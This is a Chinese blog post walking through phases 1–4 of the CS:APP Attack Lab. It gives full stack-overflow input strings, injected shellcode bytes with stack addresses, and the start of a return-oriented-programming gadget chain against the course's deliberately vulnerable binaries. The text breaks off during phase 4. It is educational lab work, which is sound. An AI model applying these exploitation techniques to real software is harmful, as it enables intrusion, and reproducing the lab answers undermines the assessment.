

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=light>



<head>
  <meta charset="UTF-8">
  <meta name="referrer" content="no-referrer">
  <link rel="stylesheet" href="https://npm.elemecdn.com/lxgw-wenkai-screen-webfont/style.css" media="print" onload="this.media='all'">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Cao Dong">
  <meta name="keywords" content="">
  
    <meta name="description" content="phase1首先，通过这个指令生成前三个阶段要用到的ctarget的反汇编代码objdump -d .&#x2F;ctarget &gt;&gt; target.s其次，假设我们的输入文件是touch1.txt，那么运行这个指令就可以去验证是否是正确的.&#x2F;hex2raw &lt;touch1.txt | .&#x2F;ctarget -q整理一下phase1个意思  它想要我们通过输入使栈溢出，并且覆盖这个函数的返回">
<meta property="og:type" content="article">
<meta property="og:title" content="csapp_lab3">
<meta property="og:url" content="http://example.com/2023/07/30/csapp-lab3/index.html">
<meta property="og:site_name" content="dcao&#39;s blog">
<meta property="og:description" content="phase1首先，通过这个指令生成前三个阶段要用到的ctarget的反汇编代码objdump -d .&#x2F;ctarget &gt;&gt; target.s其次，假设我们的输入文件是touch1.txt，那么运行这个指令就可以去验证是否是正确的.&#x2F;hex2raw &lt;touch1.txt | .&#x2F;ctarget -q整理一下phase1个意思  它想要我们通过输入使栈溢出，并且覆盖这个函数的返回">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-07-30T12:25:24.000Z">
<meta property="article:modified_time" content="2023-12-24T12:25:48.295Z">
<meta property="article:author" content="Cao Dong">
<meta property="article:tag" content="CSAPP">
<meta name="twitter:card" content="summary_large_image">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>csapp_lab3 - dcao&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.0.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>CaoDong</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/scenery/p1.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="csapp_lab3"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        Cao Dong
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-07-30 20:25" pubdate>
          2023年7月30日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.7k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          23 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">csapp_lab3</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="phase1"><a href="#phase1" class="headerlink" title="phase1"></a>phase1</h1><p>首先，通过这个指令生成前三个阶段要用到的ctarget的反汇编代码<code>objdump -d ./ctarget &gt;&gt; target.s</code><br>其次，假设我们的输入文件是touch1.txt，那么运行这个指令就可以去验证是否是正确的<code>./hex2raw &lt;touch1.txt | ./ctarget -q</code><br>整理一下phase1个意思</p>
<ol>
<li>它想要我们通过输入使栈溢出，并且覆盖这个函数的返回地址，使这个地址指向我们想要的函数</li>
<li>因此，我们需要从十六进制的角度构造我们的输入</li>
<li>但是题目使用的是getbuf这个函数从标准输入区读取输入，因此它是以字符串的形式来读取。</li>
<li>我们需要把我们构造出来的十六进制数据转成对应的字符串。而这个工作cmu已经帮我们做好了，就是这个程序<code>hex2raw</code>。</li>
<li>所以我们可以现在一个txt文件中写好我们的输入，然后通过上述程序将这个文件中的十六进制数据转为字符串，最后使用这个字符串作为ctarget的输入。<br>接下来可以正式进入解题了<br>整体的流程是，test函数会调用getbuf，我们需要在getbuf的函数中操作，使得getbuf不会正常返回，而是返回到touch1函数<br>可以发现，getbuf这个函数给自己开辟了40个字节的栈空间，因此它的返回地址其实是在第41-48个字节<br>因此，我们的注入应该包含48个字节<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs c++">(gdb) disas getbuf<br>Dump of assembler code <span class="hljs-keyword">for</span> function getbuf:<br>   <span class="hljs-number">0x00000000004017a8</span> &lt;+<span class="hljs-number">0</span>&gt;:     sub    $<span class="hljs-number">0x28</span>,%rsp<br>   <span class="hljs-number">0x00000000004017ac</span> &lt;+<span class="hljs-number">4</span>&gt;:     mov    %rsp,%rdi<br>   <span class="hljs-number">0x00000000004017af</span> &lt;+<span class="hljs-number">7</span>&gt;:     callq  <span class="hljs-number">0x401a40</span> &lt;Gets&gt;<br>   <span class="hljs-number">0x00000000004017b4</span> &lt;+<span class="hljs-number">12</span>&gt;:    mov    $<span class="hljs-number">0x1</span>,%eax<br>   <span class="hljs-number">0x00000000004017b9</span> &lt;+<span class="hljs-number">17</span>&gt;:    add    $<span class="hljs-number">0x28</span>,%rsp<br>   <span class="hljs-number">0x00000000004017bd</span> &lt;+<span class="hljs-number">21</span>&gt;:    retq<br>End of assembler dump.<br></code></pre></td></tr></table></figure>
接下来，需要找到touch1的地址，在我的这个文件里，touch1函数的起始地址是0x4017c0<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs c++">(gdb) disas touch1<br>Dump of assembler code <span class="hljs-keyword">for</span> function touch1:<br>   <span class="hljs-number">0x00000000004017c0</span> &lt;+<span class="hljs-number">0</span>&gt;:     sub    $<span class="hljs-number">0x8</span>,%rsp<br>   <span class="hljs-number">0x00000000004017c4</span> &lt;+<span class="hljs-number">4</span>&gt;:     movl   $<span class="hljs-number">0x1</span>,<span class="hljs-number">0x202d0e</span>(%rip)        # <span class="hljs-number">0x6044dc</span> &lt;vlevel&gt;<br>   <span class="hljs-number">0x00000000004017ce</span> &lt;+<span class="hljs-number">14</span>&gt;:    mov    $<span class="hljs-number">0x4030c5</span>,%edi<br>   <span class="hljs-number">0x00000000004017d3</span> &lt;+<span class="hljs-number">19</span>&gt;:    callq  <span class="hljs-number">0x400cc0</span> &lt;puts@plt&gt;<br>   <span class="hljs-number">0x00000000004017d8</span> &lt;+<span class="hljs-number">24</span>&gt;:    mov    $<span class="hljs-number">0x1</span>,%edi<br>   <span class="hljs-number">0x00000000004017dd</span> &lt;+<span class="hljs-number">29</span>&gt;:    callq  <span class="hljs-number">0x401c8d</span> &lt;validate&gt;<br>   <span class="hljs-number">0x00000000004017e2</span> &lt;+<span class="hljs-number">34</span>&gt;:    mov    $<span class="hljs-number">0x0</span>,%edi<br>   <span class="hljs-number">0x00000000004017e7</span> &lt;+<span class="hljs-number">39</span>&gt;:    callq  <span class="hljs-number">0x400e40</span> &lt;exit@plt&gt;<br>End of assembler dump.<br></code></pre></td></tr></table></figure>
因此构造的输入应该是下面这样，前40个字节随便填，后面八个字节需要是地址，整体应该和下面一样。<br>其实最后八个字节到底按什么顺序写还是挺有讲究的。<br>首先，我们读入的内容是从栈顶到栈底一次写入，想一下内存中的栈的那个图，也就是说我们写入的东西其实从从下往上从右往左一个一个填入栈中的，因此按下面这个方式输入的话，在栈的某一层，存的应该是00 00 00 00 00 40 17 c0，乍一看这不就是我们的地址吗？说好的小端法呢？<br>先回忆一下小端法的定义，小端法指的是低位放在低地址处，我们这c0是低位，它放的是地址的低处吗？当然是，因为栈是从上往下递减的，虽然看着c0是放在最后面，但是其实它是低地址处。<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br><span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br><span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br><span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br><span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br>c0 <span class="hljs-number">17</span> <span class="hljs-number">40</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br></code></pre></td></tr></table></figure>
通过<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs c++">woaixiaoxiao@LAPTOP-URFTCS5A:~/CSAPP/<span class="hljs-number">3</span>_attacklab$ ./hex2raw &lt;touch1.txt | ./ctarget -q<br>Cookie: <span class="hljs-number">0x59b997fa</span><br>Type string:Touch1!: <span class="hljs-function">You called <span class="hljs-title">touch1</span><span class="hljs-params">()</span></span><br><span class="hljs-function">Valid solution <span class="hljs-keyword">for</span> level 1 with target ctarget</span><br><span class="hljs-function">PASS: Would have posted the following:</span><br><span class="hljs-function">        user id bovik</span><br><span class="hljs-function">        course  <span class="hljs-number">15213</span>-f15</span><br><span class="hljs-function">        lab     attacklab</span><br><span class="hljs-function">        result  <span class="hljs-number">1</span>:PASS:<span class="hljs-number">0xffffffff</span>:ctarget:<span class="hljs-number">1</span>:<span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> C0 <span class="hljs-number">17</span> <span class="hljs-number">40</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span></span><br></code></pre></td></tr></table></figure></li>
</ol>
<h1 id="phase2"><a href="#phase2" class="headerlink" title="phase2"></a>phase2</h1><p>这一次就更大胆了，上次只是修改一下返回地址，使得程序转去执行已有的代码<br>这一次要做的事情是自己先写一段代码，然后重定向到自己写的代码中。<br>而自己写的汇编代码就是要调用<code>void touch2(unsigned val)</code>函数，并且还得穿个参数</p>
<ol>
<li>传参数就是传自己的cookie：0x59b997fa到rdi寄存器，即函数的第一个参数所在的寄存器</li>
<li>然后就是转移到touch2，这里推荐的转移方法是通过ret指令，而ret指令是从栈中弹出一个地址，所以还需要先把要去的地址压栈<br>首先，找到touch2的起始地址：0x00000000004017ec<br>然后编写汇编文件<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs c++">mov $<span class="hljs-number">0x59b997fa</span>,%rdi<br>pushq $<span class="hljs-number">0x00000000004017ec</span><br>retq<br></code></pre></td></tr></table></figure>
然后将这个汇编文件转为二进制形式：因为我们需要二进制形式。</li>
<li>将这个汇编文件变成可执行文件<code>gcc -c touch2.s</code></li>
<li>然后使用<code>objdump -d touch2.o</code>就可以获得有二进制的文件了<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-number">0000000000000000</span> &lt;.text&gt;:<br>   <span class="hljs-number">0</span>:   <span class="hljs-number">48</span> c7 c7 fa <span class="hljs-number">97</span> b9 <span class="hljs-number">59</span>    mov    $<span class="hljs-number">0x59b997fa</span>,%rdi<br>   <span class="hljs-number">7</span>:   <span class="hljs-number">68</span> ec <span class="hljs-number">17</span> <span class="hljs-number">40</span> <span class="hljs-number">00</span>          pushq  $<span class="hljs-number">0x4017ec</span><br>   c:   c3                      retq   <br></code></pre></td></tr></table></figure>
因此，我们要输入13个字节，依次是48 c7 c7 fa 97 b9 59 68 ec 17 40 00 c3<br>如果我们直接把这个作为输入，那么我们的程序就已经在内存中了，但是怎么去执行呢？那就要使用phase1中的重定向功能了<br>如果将13个字节中的48作为输入数据的开头，那么我们的程序的起始地址就是getbuf函数的栈顶，通过打断点然后查看rsp的值，发现rsp的值为<code>0x5561dc78</code><br>至此，所有原材料都ok了，现在就是拼接成我们的输入</li>
<li>首先，重定向地址和phase1一样的输入方式</li>
<li>其次，我们写的代码，也就是48开头的那一拨，这些属于指令，指令就是从低地址开始取的，不需要考虑小端法。小端法只对数据有作用！</li>
<li>注意我们写的代码加上补充的0需要够40个字节。问就是我第一次少输入了八个字节的0<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-number">48</span> c7 c7 fa <span class="hljs-number">97</span> b9 <span class="hljs-number">59</span> <span class="hljs-number">68</span><br>ec <span class="hljs-number">17</span> <span class="hljs-number">40</span> <span class="hljs-number">00</span> c3 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br><span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br><span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br><span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br><span class="hljs-number">78</span> dc <span class="hljs-number">61</span> <span class="hljs-number">55</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br></code></pre></td></tr></table></figure></li>
</ol>
<h1 id="phase3"><a href="#phase3" class="headerlink" title="phase3"></a>phase3</h1><p>这一个阶段的意思是</p>
<ol>
<li>首先我们依然要重定向到一个函数，这里是touch3，并且我们需要传入一个参数。这就是phase2的任务了</li>
<li>关键在于我们通过getbuf-&gt;touch3，在getbuf执行完之后，我们去执行touch3。在执行touch3的时候，getbuf函数的栈其实已经被收回了，而且在touch3中又调用了函数，所以原来getbuf的栈里的东西都不能用了。</li>
<li>而题目要求我们先把我们的字符串放到内存的某个位置，然后把这个字符串的地址作为参数传给touch3。传地址给touch3倒没啥问题，关键在于我们的字符串就不能放在getbuf的栈中了。哪里安全呢？这就是这个阶段的关键，我们要把字符串存到一个安全的内存去。<br>哪里的内存是安全的呢？下面是函数的调用顺序，其中getbuf函数执行之后就把空间还回去了。最安全的地方当然还是往getbuf栈帧空间的上面去。也就是test的栈帧空间</li>
<li>test</li>
<li>getbuf</li>
<li>touch3</li>
<li>hexmatch</li>
<li>strncmp<br>首先，我的cookie是0x59b997fa，翻译为ascii码如下所示。注意:需要转为十六进制的表示。因此我这个字符串就应该是35 39 62 39 39 37 66 61 00。并且字符串也是没有字节序的概念的<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs c++">字符:        <span class="hljs-string">&#x27;5&#x27;</span>    <span class="hljs-string">&#x27;9&#x27;</span>    <span class="hljs-string">&#x27;b&#x27;</span>    <span class="hljs-string">&#x27;9&#x27;</span>    <span class="hljs-string">&#x27;9&#x27;</span>    <span class="hljs-string">&#x27;7&#x27;</span>    <span class="hljs-string">&#x27;f&#x27;</span>    <span class="hljs-string">&#x27;a&#x27;</span>    <span class="hljs-string">&#x27;\0&#x27;</span><br>ASCII值:    <span class="hljs-number">53</span>     <span class="hljs-number">57</span>     <span class="hljs-number">98</span>     <span class="hljs-number">57</span>     <span class="hljs-number">57</span>     <span class="hljs-number">55</span>     <span class="hljs-number">102</span>    <span class="hljs-number">97</span>     <span class="hljs-number">0</span><br>十六进制:   <span class="hljs-number">35</span>     <span class="hljs-number">39</span>     <span class="hljs-number">62</span>     <span class="hljs-number">39</span>     <span class="hljs-number">39</span>     <span class="hljs-number">37</span>     <span class="hljs-number">66</span>     <span class="hljs-number">61</span>     <span class="hljs-number">00</span><br></code></pre></td></tr></table></figure>
通过gdb调试可以发现，test函数的栈帧从5561dca8开始，在调用getbuf之前，又向下扩展了8个字节，变成了5561dca0，而这个位置其实也就是我们之前一直偷偷放重定向函数的位置。<br>因此，我们的字符串应该放在5561dca8这里，其实也就是贴着重定向的地址放即可。<br>最终的答案如下，相比于第二阶段</li>
<li>只需要修改我们自己写的汇编代码的参数为字符串的地址</li>
<li>然后将汇编代码中touch2的地址改为touch3的地址</li>
<li>在最后面加上我们的字符串即可<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-number">48</span> c7 c7 a8 dc <span class="hljs-number">61</span> <span class="hljs-number">55</span> <span class="hljs-number">68</span><br>fa <span class="hljs-number">18</span> <span class="hljs-number">40</span> <span class="hljs-number">00</span> c3 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br><span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br><span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span><br><span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-comment">// 以上为getbuf的栈帧</span><br><span class="hljs-number">78</span> dc <span class="hljs-number">61</span> <span class="hljs-number">55</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-comment">// 这里的地址是5561dca0，存储的是重定向的地址</span><br><span class="hljs-number">35</span> <span class="hljs-number">39</span> <span class="hljs-number">62</span> <span class="hljs-number">39</span> <span class="hljs-number">39</span> <span class="hljs-number">37</span> <span class="hljs-number">66</span> <span class="hljs-number">61</span> <span class="hljs-number">00</span> <span class="hljs-comment">// 这里的地址是5561dca8，存储的是字符串</span><br></code></pre></td></tr></table></figure></li>
</ol>
<h1 id="phase4"><a href="#phase4" class="headerlink" title="phase4"></a>phase4</h1><p>这个阶段要完成的任务和phase2是一样的，即</p>
<ol>
<li>将我们的cookie传入rdi</li>
<li>将控制权移到touch2中<br>但是这里的比较难，因为栈中的代码不可执行<br>所以我们只能去已有的代码库中拼凑出我们需要的指令，一种思路是这样</li>
<li>将我们的cookie通过一个pop函数弹出到某个寄存器，因为pop函数不需要我们去指定地址，是自动从栈里弹出一个数字出来</li>
<li>然后将rdi设置为这个寄存器的值，找到一个对应的mov指令</li>
<li>上面那个指令应该以ret结尾，我们提前将touch2的地址放在栈中，这一ret，正好就跳到ret去执行了<br>注意点</li>
<li>这个时候栈的地址是随机的，但是我们的输入塞到栈的缓冲区之后，逻辑上依然是和之前栈地址连续一样的，只不过显示出来的值是随机的<br>首先，通过<code>objdump -d rtarget &gt; rtarget.txt</code>将rtarget反汇编<br>然后去start_farm到end_farm中去凑我们需要的指令，pop有以下这么多种，我们除了pop，还应该衔接一个ret，它的编码是0xc3，另外，我们出现0x90也是合法的，应该这玩意就是nop指令，摸鱼用的。<blockquote>
<p>popq R 58 59 5a 5b 5c 5d 5e 5f</p>
</blockquote>
</li>
</ol>
<p>经过查找，发现了一个合适的，从4019ab开始，是58 90 c3分别代表了pop rax，nop，ret。</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-number">00000000004019</span>a7 &lt;addval_219&gt;:<br>  <span class="hljs-number">4019</span>a7:	<span class="hljs-number">8</span>d <span class="hljs-number">87</span> <span class="hljs-number">51</span> <span class="hljs-number">73</span> <span class="hljs-number">58</span> <span class="hljs-number">90</span>    	lea    <span class="hljs-number">-0x6fa78caf</span>(%rdi),%eax<br>  <span class="hljs-number">4019</span>ad:	c3                   	retq   <br></code></pre></td></tr></table></figure>
<p>如果栈中的结构如下所示，那么getbuf结束之后就会去执行4019ab处的代码，这个代码会将cookie放到rax中</p>
<ol>
<li>cookie</li>
<li>4019ab</li>
<li>getbuf的缓冲区<br>那么现在就应该在cookie上面再放一个地址，这个地址可以把rax的值挪到rdi中。查表之后发现，这个操作对应的机器码是48 89 c7。经过查找，下面这个片段可以利用，将地址放在4019a2，就正好执行了mov操作时候，ret掉<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-number">00000000004019</span>a0 &lt;addval_273&gt;:<br>  <span class="hljs-number">4019</span>a0:	<span class="hljs-number">8</span>d <span class="hljs-number">87</span> <span class="hljs-number">48</span> <span class="hljs-number">89</span> c7 c3    	lea    <span class="hljs-number">-0x3c3876b8</span>(%rdi),%eax<br>  <span class="hljs-number">4019</span>a6:	c3                   	retq  <br></code></pre></td></tr></table></figure>
那么ret应该ret到哪呢？当然是touch2的地址，去gdb中查询之后发现，touch2的地址是0x4017ec<br>由此，我们的原材料已经准备好了。这时候的栈从上到下应该是</li>
<li>0x4017ec</li>
<li>0x4019a2</li>
<li>cookie(0x59b997fa)</li>
<li>0x4019ab</li>
